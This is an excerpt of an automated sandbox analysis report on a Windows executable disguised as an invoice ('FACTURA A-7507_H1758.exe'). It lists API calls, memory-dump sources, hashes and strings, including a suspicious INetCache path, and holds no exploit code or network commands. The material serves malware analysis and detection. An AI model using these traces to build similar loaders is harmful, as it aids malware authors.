                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                                          • Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                          • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                                          • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000028,?,?,004040A3), ref: 00404285
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                                                                                                                                                                          • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: f9d451d74586546bbd407ca2e24b621689a583ca5f98dcf473e6f9f09c96531a
                                                                                                                                                                                                                          • Instruction ID: 98ea867d558ea3f6c4ea23e9af3ccb97d5497e9459daf2a95be3f4ba7839a378
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d451d74586546bbd407ca2e24b621689a583ca5f98dcf473e6f9f09c96531a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7D01277B14100DBD760EFB9BF89C6F73A9EB513293214837D902E11A2D57DC812462D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040547A
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405489
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004054C6
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004054CD
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405569
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040558A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405498
                                                                                                                                                                                                                            • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,?,004040A3), ref: 00404285
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055DC
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004055F1
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405615
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040561A
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405664
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004056A9
                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004056DD
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040573E
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405744
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040575A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040579F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID: (7B${
                                                                                                                                                                                                                          • API String ID: 590372296-525222780
                                                                                                                                                                                                                          • Opcode ID: bb3fbbfb339c73c7f4eaa2fafe416b05982b245f29a0fe8eabc07e204e53b29a
                                                                                                                                                                                                                          • Instruction ID: 916ab36d0f469a383f2c04aed4d67e33a9af93c646c7432e75c1414f8414c4dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb3fbbfb339c73c7f4eaa2fafe416b05982b245f29a0fe8eabc07e204e53b29a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040472C
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404756
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404807
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404812
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 00404844
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404850
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404862
                                                                                                                                                                                                                            • Part of subcall function 004058A7: GetDlgItemTextW.USER32(?,?,00000400,00404899), ref: 004058BA
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharNextW.USER32(?,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                                                                                                                                                                            • Part of subcall function 00406412: CharPrevW.USER32(?,?,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404925
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 00404A99: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                                                                                                                                                                            • Part of subcall function 00404A99: wsprintfW.USER32 ref: 00404B43
                                                                                                                                                                                                                            • Part of subcall function 00404A99: SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: (7B$868$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration$Call
                                                                                                                                                                                                                          • API String ID: 2624150263-3649986087
                                                                                                                                                                                                                          • Opcode ID: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                                                                                                                                                                          • Instruction ID: d5aaf60bd55b21875b9c8b9a8d0b3d7e01f34e6f89f3adcbdcc63617e1d21faf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c988a2c75076f1e590c134e256cc95cfc43452e7a67f3061b6eea54995cb3a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7A191F1A00209ABDB11AFA5CC45AAF77B8EF84354F10847BF601B62D1D77C99418B6D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn, xrefs: 00402154
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn
                                                                                                                                                                                                                          • API String ID: 542301482-1441128270
                                                                                                                                                                                                                          • Opcode ID: 4186039756558c631eee119f4fdf18c30d8387add4dff58370c0f886253180e0
                                                                                                                                                                                                                          • Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4186039756558c631eee119f4fdf18c30d8387add4dff58370c0f886253180e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040447D
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404491
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004044AE
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004044BF
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044CD
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044DB
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004044E0
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044ED
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404502
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040455B
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404562
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040458D
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D0
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045DE
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004045E1
                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,?), ref: 004045F6
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404602
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404605
                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,?,00000000), ref: 00404634
                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: Call$N$VC@$open
                                                                                                                                                                                                                          • API String ID: 3615053054-2503634124
                                                                                                                                                                                                                          • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                                                                                                                                                                          • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,00406040,?,?), ref: 00405EBC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00406040,?,?), ref: 00405EE0
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
                                                                                                                                                                                                                            • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                                                                                                                                                                            • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F24
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
